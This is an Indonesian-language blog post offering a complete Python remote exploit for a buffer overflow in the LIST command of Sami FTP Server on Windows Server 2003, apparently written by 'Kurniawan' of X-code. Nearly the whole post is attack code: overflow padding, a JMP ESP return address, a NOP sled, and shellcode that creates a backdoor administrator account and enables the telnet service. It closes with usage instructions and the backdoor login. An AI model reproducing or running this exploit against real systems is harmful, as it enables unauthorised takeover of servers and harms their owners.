Exploit remote Sami FTP Server untuk Windows Server

admin

Berikut Exploit Sami FTP Server untuk Windows Server yang dibuat oleh Kurniawan

#!/usr/bin/python
import socket
import sys
 
if len(sys.argv) != 3:
    print "==========================================================================="
    print "Exploit remote untuk Sami FTP Server pada celah LIST di Windows Server 2003"
    print "---------------------------------------------------------------------------"
    print "Progammer Kurniawan. [email protected]. xcode.or.id."
    print "Cara penggunaan : ./exploitsamiftp.py <ip target> <port>"
    sys.exit(1)
 
ipaddress = sys.argv[1]
port = int(sys.argv[2])
buf = "\x41" * 217
eip = "\xFC\x9A\x48\x77" #JMP ESP, shell32.dll, Windows Server 2003
nop = "\x90" * 37
#shellcode dibuat dengan bahasa pemrograman assembly oleh kurniawan. E-mail : [email protected]. xcode.or.id
#Akses telnet :
#username : kurniawan
#password : yogyafreexcode
shellcode  = ( "\xeb\x18\x5b\x31\xc0\x50\x31\xc0\x53\xbb\xc1\x99\xe6\x77\xff\xd3\x31\xc0\x50\xbb\xe4\xf1\xe4\x77\xff\xd3\xe8\xe3\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x6b\x75\x72\x6e\x69\x61\x77\x61\x6e\x20\x79\x6f\x67\x79\x61\x66\x72\x65\x65\x78\x63\x6f\x64\x65\x20\x2f\x61\x64\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x6b\x75\x72\x6e\x69\x61\x77\x61\x6e\x20\x2f\x61\x64\x64\x20\x26\x20\x73\x63\x20\x63\x6f\x6e\x66\x69\x67\x20\x74\x6c\x6e\x74\x73\x76\x72\x20\x73\x74\x61\x72\x74\x3d\x20\x61\x75\x74\x6f\x20\x26\x20\x73\x63\x20\x73\x74\x61\x72\x74\x20\x74\x6c\x6e\x74\x73\x76\x72\x20\x26\x30\x78\x30\x30"
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(ipaddress),(port)))
print s.recv(1024)
s.send("USER anonymous\r\n")
print s.recv(1024)
s.send("PASS anonymous\r\n")
print s.recv(1024)
s.send("LIST " + buf + eip + nop + shellcode + "\r\n")
#reference bug : https://www.exploit-db.com/exploits/24875
print s.recv(1024)
s.close()
print "Eksploitasi telah dilakukan. Untuk mengakses server target, ketik : telnet (ip target server) lalu enter"
print "username : kurniawan"
print "password : yogyafreexcode"

Exploit ini bisa diakses di https://github.com/kurniawandata/exploitsamiftplistforwinserver

Oleh Kurniawan

Founder X-code

Leave a Reply

Your email address will not be published.